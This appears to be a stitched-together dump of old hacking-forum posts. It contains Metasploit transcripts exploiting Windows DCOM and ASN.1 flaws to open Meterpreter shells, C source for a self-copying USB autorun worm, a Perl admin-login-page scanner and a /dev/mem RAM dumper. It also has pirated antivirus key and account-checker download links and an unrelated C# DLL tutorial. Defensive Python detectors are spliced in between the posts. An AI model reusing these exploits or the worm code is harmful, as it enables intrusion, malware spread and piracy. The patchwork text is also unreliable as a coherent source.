msf exploit(ms03_026_dcom) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  172.16.1.31      yes       The target address
   RPORT  135              yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     172.16.1.31      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] The DCERPC service did not reply to our request
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >

=============================================================================================

[o] KILLBILL SMB Exploit (ms04_007_killbill)

# Description
This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encountered when using the equivalent bind payloads. Your mileage may vary.

msf > use windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_007_killbill) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms04_007_killbill) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST  172.16.1.31      yes       The target address
   RPORT  445              yes       Set the SMB service port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     172.16.1.31      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > exploit
[*] Started bind handler
[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)

meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >

by matthews
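Seen from the network, both sessions above have the same shape: a connection to 135/tcp or 445/tcp, followed seconds later by a connection from the same source to a port (4444, the bind_tcp LPORT) that is not among the ports the nmap scan found listening. The following Python correlation is an added example, not part of the original post; the log format and the sample lines are constructed assumptions.

```python
"""Flag 'service connection, then new listener' sequences in connection logs."""
import re
from datetime import datetime, timedelta

# Listening ports nmap reported for the XP SP1 host in the post: the baseline.
BASELINE_PORTS = {135, 139, 445, 1025, 5000}
# Services the two modules talk to: RPC endpoint mapper and SMB.
EXPLOITED_PORTS = {135, 445}
WINDOW = timedelta(seconds=60)

# Assumed (hypothetical) log format: "<ISO time> <src>:<sport> -> <dst>:<dport> ESTABLISHED"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d) "
    r"(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+) ESTABLISHED$"
)

# Constructed sample data; the addresses mirror the lab network in the transcript.
SAMPLE_LOG = """\
2009-06-21T10:00:01 172.16.1.20:51000 -> 172.16.1.31:445 ESTABLISHED
2009-06-21T10:02:10 172.16.1.12:38411 -> 172.16.1.31:135 ESTABLISHED
2009-06-21T10:02:14 172.16.1.12:38423 -> 172.16.1.31:4444 ESTABLISHED
2009-06-21T10:05:00 172.16.1.20:51002 -> 172.16.1.31:139 ESTABLISHED
2009-06-21T10:30:00 172.16.1.12:33470 -> 172.16.1.31:445 ESTABLISHED
2009-06-21T10:30:09 172.16.1.12:33484 -> 172.16.1.31:4444 ESTABLISHED
2009-06-21T11:00:00 172.16.1.40:40000 -> 172.16.1.31:135 ESTABLISHED
2009-06-21T11:10:00 172.16.1.40:40001 -> 172.16.1.31:4444 ESTABLISHED
malformed line that the parser must skip
"""


def parse_line(line):
    """Return (timestamp, src, dst, dport), or None for lines that do not match."""
    match = LINE_RE.match(line.strip())
    if not match:
        return None
    return (datetime.fromisoformat(match["ts"]), match["src"],
            match["dst"], int(match["dport"]))


def find_sequences(lines, baseline=BASELINE_PORTS, window=WINDOW):
    """Alert when a source hits 135/445 and then a non-baseline port within `window`."""
    events = sorted(event for event in map(parse_line, lines) if event)
    last_service_hit = {}  # (src, dst) -> (time, port) of the latest 135/445 connection
    alerts = []
    for ts, src, dst, dport in events:
        pair = (src, dst)
        if dport in EXPLOITED_PORTS:
            last_service_hit[pair] = (ts, dport)
        elif dport not in baseline and pair in last_service_hit:
            hit_ts, service_port = last_service_hit[pair]
            if ts - hit_ts <= window:
                alerts.append({
                    "src": src,
                    "dst": dst,
                    "service_port": service_port,
                    "new_port": dport,
                    "delay_s": int((ts - hit_ts).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_sequences(SAMPLE_LOG.splitlines()):
        print(alert)
```

The same rule also catches a listener on any other unexpected port, because it keys on the host's baseline rather than on 4444.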
-
Kaspersky Internet Security stops your PC being slowed down by cybercriminals and delivers unsurpassed on-line safety whilst protecting your files, music and photos from hackers : Keeps your money and identity safe Improved! Protects against bank account fraud Safeguards against online shopping threats Allows questionable applications and websites to be run in 'Safe Run Mode' New! Cybercriminals won’t hi-jack your PC Family protection from on-line predators Your files won’t be ruined by hackers Improved! Keeps your PC running smoothly Safer Wi-Fi connections Two way personal firewall Working keys till February 2010 Download: http://www.mediafire.com/download.php?edzmhto3juy
-
#include <windows.h> #include <stdio.h> int InfectDrives( ); int WriteINI( char* sINI, char* sFILE ); int ReadINI( char* sINI, char* sFILE ); int FileCopy( char* sNEW ); char* szFileName = "blah.exe"; int main() { int i = InfectDrives( ); printf( "drives infected: %i", i ); getchar( ); return 0; }; int InfectDrives( ) { char szBuffer[260]; char szInit[520], szFile[520]; int iCount = 0, iGet, iType; iGet = GetLogicalDriveStringsA( sizeof( szBuffer ), szBuffer ); if( iGet == 0 ) { return( 0 ); } char *szDrive = szBuffer; while( *szDrive ) { iType = GetDriveTypeA( szDrive ); sprintf( szInit, "%sautorun.inf", szDrive ); //craft inf sprintf( szFile, "%s%s", szDrive, szFileName ); //craft file if( iType == 2 ) //removable device { if( ReadINI( szInit, szFileName ) == 0 ) //check for infection { if( WriteINI( szInit, szFileName ) == 0 ) //infect { if( FileCopy( szFile ) == 0 ) //copy file { iCount++; } } } } szDrive = &szDrive[ strlen( szDrive ) + 1]; } return( iCount ); }; int WriteINI( char* sINI, char* sFILE ) { unsigned long bWrite = WritePrivateProfileString( "autorun", "open", sFILE, sINI ); if( bWrite == 0 ) { return( 1 ); } return( 0 ); }; int ReadINI( char* sINI, char* sFILE ) { char szBuffer[260]; unsigned long lRead = GetPrivateProfileString( "autorun", "open", NULL, szBuffer, sizeof( szBuffer ), sINI ); if( lRead != 0 ) { if( strstr( szBuffer, sFILE ) ) { return( 1 ); } } return( 0 ); }; int FileCopy( char* sNEW ) { char szBuffer[260]; GetModuleFileName( NULL, szBuffer, sizeof( szBuffer ) ); bool bCopy = CopyFile( szBuffer, sNEW, 0 ); if( bCopy == false ) { return( 1 ); } return( 0 ); }
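On the defender's side, the code above leaves two artifacts on a removable drive: an autorun.inf whose [autorun] section carries an open= entry, and the executable it names in the drive root. The following Python audit is an added example, not part of the original post; checking the shellexecute and shell\...\command keys goes beyond the open key used above, and the sample drive contents are constructed.

```python
"""Audit a mounted removable drive for autorun.inf launch entries."""
import os
import tempfile

# Extensions treated as directly launchable; the list is an assumption of this example.
EXEC_EXT = {".exe", ".com", ".scr", ".bat", ".cmd", ".pif", ".vbs", ".js"}


def parse_autorun(text):
    """Return {key: value} from the [autorun] section, skipping junk lines."""
    entries, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def command_target(value):
    """Extract the program path from a command line, honouring double quotes."""
    value = value.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return value[1:end] if end != -1 else value[1:]
    return value.split()[0] if value else ""


def is_launch_key(key):
    """Keys that make the shell start a program from the drive."""
    return key in ("open", "shellexecute") or (
        key.startswith("shell\\") and key.endswith("\\command"))


def audit_drive(root):
    """List launch entries found in <root>/autorun.inf (file name is case-insensitive)."""
    names = {name.lower(): name for name in os.listdir(root)}
    inf_name = names.get("autorun.inf")
    if inf_name is None:
        return []
    with open(os.path.join(root, inf_name), encoding="latin-1") as handle:
        entries = parse_autorun(handle.read())
    findings = []
    for key, value in sorted(entries.items()):
        if not is_launch_key(key):
            continue
        target = command_target(value).replace("\\", "/").lstrip("/")
        findings.append({
            "key": key,
            "target": target,
            "executable": os.path.splitext(target)[1].lower() in EXEC_EXT,
            # True when the named file sits in the drive root, as in the post.
            "present": target.lower() in names,
        })
    return findings


def demo():
    """Build a constructed drive root in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "AUTORUN.INF"), "w", newline="") as handle:
            handle.write("[AutoRun]\r\nopen=blah.exe\r\nicon=drive.ico\r\n")
        with open(os.path.join(root, "blah.exe"), "wb") as handle:
            handle.write(b"MZ constructed placeholder, not a real program")
        return audit_drive(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```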
-
#!/usr/bin/perl ## # By GlaDiaT0R # Admin Control Panel Finder ___ Version 1 # Home: Darkgh0st.com ## use HTTP::Request; use LWP::UserAgent; system('cls'); system('title Admin Control Panel Finder v1 final I[C]oded by Gladiator from H4ckCr3w.net'); print"\n"; print "-----------------------------------------------\n" ; print "[*]--Admin Control Panel Finder v 1 --------[*]\n" ; print "[*]-------------Coded By GlaDiaT0R----------[*]\n" ; print "[*]-------------From Darkgh0st.com---------[*]\n" ; print "[*]------------Greetz to Allah--------------[*]\n" ; print "*******************************************\n" ; print "\n"; print "~# enter site to scan\n* ex: www.domaine.com ou www.domaine.com/path\n-> "; $site=<STDIN>; chomp $site; print "\n"; print "~ Enter coding language of the website \n* ex: asp, php, cfm\n-> "; $code=<STDIN>; chomp($code); if ( $site !~ /^http:/ ) { $site = 'http://' . $site; } if ( $site !~ /\/$/ ) { $site = $site . '/'; } print "\n"; print "->Le site: $site\n"; print "->Source du site: $code\n"; print "->Scan de l'admin control panel en cours...\n\n\n"; if($code eq "asp"){ @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp', 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp', 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp', 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp', 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp', 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html', 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp', 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my 
$ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- # -------------------test cfm ---------------------------| # ------------------------------------------------------- if($code eq "cfm"){ @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm', 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 
'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm', 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm', 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm', 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm', 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html', 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm', 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm', 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content 
=~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- #--------------------------/test-------------------------| # ------------------------------------------------------- if($code eq "php"){ @path2=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html', 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php', 
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php', 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html', 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php', 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php', 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php', 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php' ); foreach $ways(@path2){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content 
=~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } kill("STOP",NULL); } ## # By GlaDiaT0R ##
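In a web server's access log, a run of the script above shows up as one client requesting many distinct admin-style paths within seconds, mostly answered with 404, and with the LWP::UserAgent default User-Agent (libwww-perl/...) because the script never sets its own. The following Python detector is an added example, not part of the original post; the combined log format, the thresholds and the sample lines (documentation IP ranges) are constructed assumptions.

```python
"""Detect admin-path enumeration in combined-format access logs."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Substrings shared by the candidate paths in the script's lists.
ADMIN_HINT = re.compile(r"admin|adm[/.]|login|moderator|controlpanel|/cp\.", re.I)


def build_sample_log():
    """Constructed sample: one enumerating client and one ordinary visitor."""
    base = datetime(2009, 6, 21, 10, 0, 0)
    probes = ["admin/", "administrator/", "moderator/", "webadmin/", "adminarea/",
              "bb-admin/", "adminLogin/", "admin_area/", "admin/account.php",
              "admin/index.php", "admin/login.php", "wp-login.php"]
    lines = []
    for offset, path in enumerate(probes):
        status = 200 if path == "admin/login.php" else 404
        stamp = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S +0000")
        lines.append(f'203.0.113.5 - - [{stamp}] "GET /{path} HTTP/1.1" {status} 512 '
                     f'"-" "libwww-perl/5.805"')
    for path, status in (("/", 200), ("/login.php", 200), ("/favicon.ico", 404)):
        lines.append(f'198.51.100.7 - - [21/Jun/2009:10:00:05 +0000] "GET {path} HTTP/1.1" '
                     f'{status} 900 "-" "Mozilla/5.0"')
    lines.append("truncated or malformed entry")
    return lines


def detect_scanners(lines, min_paths=8, window=timedelta(seconds=120)):
    """Report clients with >= min_paths distinct admin-style 404s inside one window."""
    per_ip = defaultdict(list)
    for line in lines:
        match = LOG_RE.match(line)
        if not match or not ADMIN_HINT.search(match["path"]):
            continue
        stamp = datetime.strptime(match["ts"], "%d/%b/%Y:%H:%M:%S %z")
        per_ip[match["ip"]].append((stamp, match["path"], int(match["status"]), match["ua"]))

    report = {}
    for ip, events in per_ip.items():
        events.sort(key=lambda event: event[0])
        misses = [(stamp, path) for stamp, path, status, _ in events if status == 404]
        best, left, in_window = 0, 0, Counter()
        for stamp, path in misses:            # sliding window over the 404s
            in_window[path] += 1
            while stamp - misses[left][0] > window:
                old = misses[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            best = max(best, len(in_window))
        if best >= min_paths:
            report[ip] = {
                "distinct_404_paths": best,
                # Paths that did answer: the pages worth restricting or reviewing.
                "answered": [path for _, path, status, _ in events if status != 404],
                "default_lwp_agent": any(ua.startswith("libwww-perl/")
                                         for _, _, _, ua in events),
            }
    return report


if __name__ == "__main__":
    for ip, info in detect_scanners(build_sample_log()).items():
        print(ip, info)
```

The "answered" list is the useful output for hardening: those are the login pages the enumeration actually reached.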
-
/* A simple tool that allows you to dump all the physical memory (RAM) */
/* For more visit: http://vx.netlux.org/wargamevx */
/* greetz: undernet @ #eof-project,#virus and to non3x for the testing */
/* Tested on:
   2.6.20-1.2320.fc5smp i686 athlon
   2.6.22-gentoo-r5 i686 AMD Turion(tm) 64 X2 Mobile Technology TL-50 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strcmp() */
#include <ctype.h>      /* isprint() */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

/* Print only the printable characters found in the buffer */
void Printable(unsigned char *str, int size)
{
    int lm = 0;

    while (lm < size) {
        if (isprint(str[lm]))
            printf("%c", str[lm]);
        lm++;
    }
}

int main(int argc, char *argv[])
{
    int fd, only_print;
    ssize_t n;
    unsigned char *buf = NULL;
    unsigned int page_size = sysconf(_SC_PAGESIZE);
    /* 64-bit total so that machines with 4 GB of RAM or more do not overflow */
    unsigned long long tot_mem =
        (unsigned long long)page_size * sysconf(_SC_PHYS_PAGES);

    if (argc < 2) {
        printf("DumpRam v0.1 by [WarGame/DoomRiderz]\n");
        printf("Usage: %s [option]\n", argv[0]);
        printf("option can be:\n");
        printf("-p = only printable chars\n");
        printf("-e = every byte\n");
        exit(EXIT_FAILURE);
    }

    /* /dev/mem is readable by root only */
    if (getuid() != 0) {
        printf("You must be root\n");
        exit(EXIT_FAILURE);
    }

    if (strcmp(argv[1], "-p") == 0)
        only_print = 1;
    else if (strcmp(argv[1], "-e") == 0)
        only_print = 0;
    else {
        printf("Invalid option\n");
        exit(EXIT_FAILURE);
    }

    fd = open("/dev/mem", O_RDONLY);
    if (fd < 0) {
        perror("/dev/mem");
        exit(EXIT_FAILURE);
    }

    printf("\n\n\n\t** RAM size in Kb: %llu\n", tot_mem / 1024);
    printf("\t** Size of a page in bytes: %u\n\n\n\n\n", page_size);

    if ((buf = malloc(page_size)) == NULL) {
        perror("malloc()");
        exit(EXIT_FAILURE);
    }

    /* Read one page at a time; stop at end of file or at the first error
       (kernels built with CONFIG_STRICT_DEVMEM refuse most of /dev/mem) */
    while ((n = read(fd, buf, page_size)) > 0) {
        if (only_print)
            Printable(buf, (int)n);
        else
            write(STDOUT_FILENO, buf, n);
    }

    close(fd);
    free(buf);
    return 0;
}
-
Creating and using DLL Files
by sunjester

DLL files are used to eliminate writing the same code over and over again. DLLs are often used for many things, like file I/O. I will show you how to take the first two tutorials I've written in this section (reading and writing text files) and put them both in a DLL file. Then, once the DLL is in our project, I will show you how to use the read and write methods we placed inside the DLL.

It's probably more feasible for .NET applications to utilize DLLs instead of rewriting so much code. C# and VB .NET applications are mostly used ("in the industry") for demo applications, or test applications for rapid application development. Yes, C# and VB.NET are RAD languages just like the old VB6.

1. First, create a new project. Open the wizard and select "Class Library" and give it an appropriate name.

2. Here you can copy and paste the code from the previous two tutorials. Below is what mine looks like now.

//sunjester
//fusecurity.com
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Collections;

namespace FileIO
{
    public class InputOutput
    {
        //writing to text files
        public void writeToFile(string fileName, string content)
        {
            StreamWriter write = new StreamWriter(fileName);
            write.Write(content);
            write.Close();
        }

        //reading from text files
        public ArrayList Read(string fileName)
        {
            StreamReader read = new StreamReader(fileName);
            ArrayList lines = new ArrayList();
            while (!read.EndOfStream)
            {
                lines.Add(read.ReadLine());
            }
            read.Close();
            return lines;
        }
    }
}

3. Now we can build the DLL, so in the menu select "Build" then "Build Solution".

4. Next, let's go ahead and add another project to this one, just in case we need to go back to the original DLL source and update it.

5. Name it accordingly.

6. Now we add the reference to the DLL file we just created.

7. And the final code.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using FileIO;
using System.Collections;

namespace UseFileIO2
{
    class Program
    {
        static void Main(string[] args)
        {
            InputOutput io = new InputOutput();
            io.writeToFile("c:\\test44.txt", "here is some sample test data to write");
            ArrayList lines = io.Read("c:\\test44.txt");
            for (int i = 0; i < lines.Count; i++)
            {
                Console.WriteLine(lines[i]);
            }
        }
    }
}
-
Demo: http://linkvn.info/checker/ Download: http://www.2shared.com/file/7080989/60eb434b/Rapid_Account_Checker.html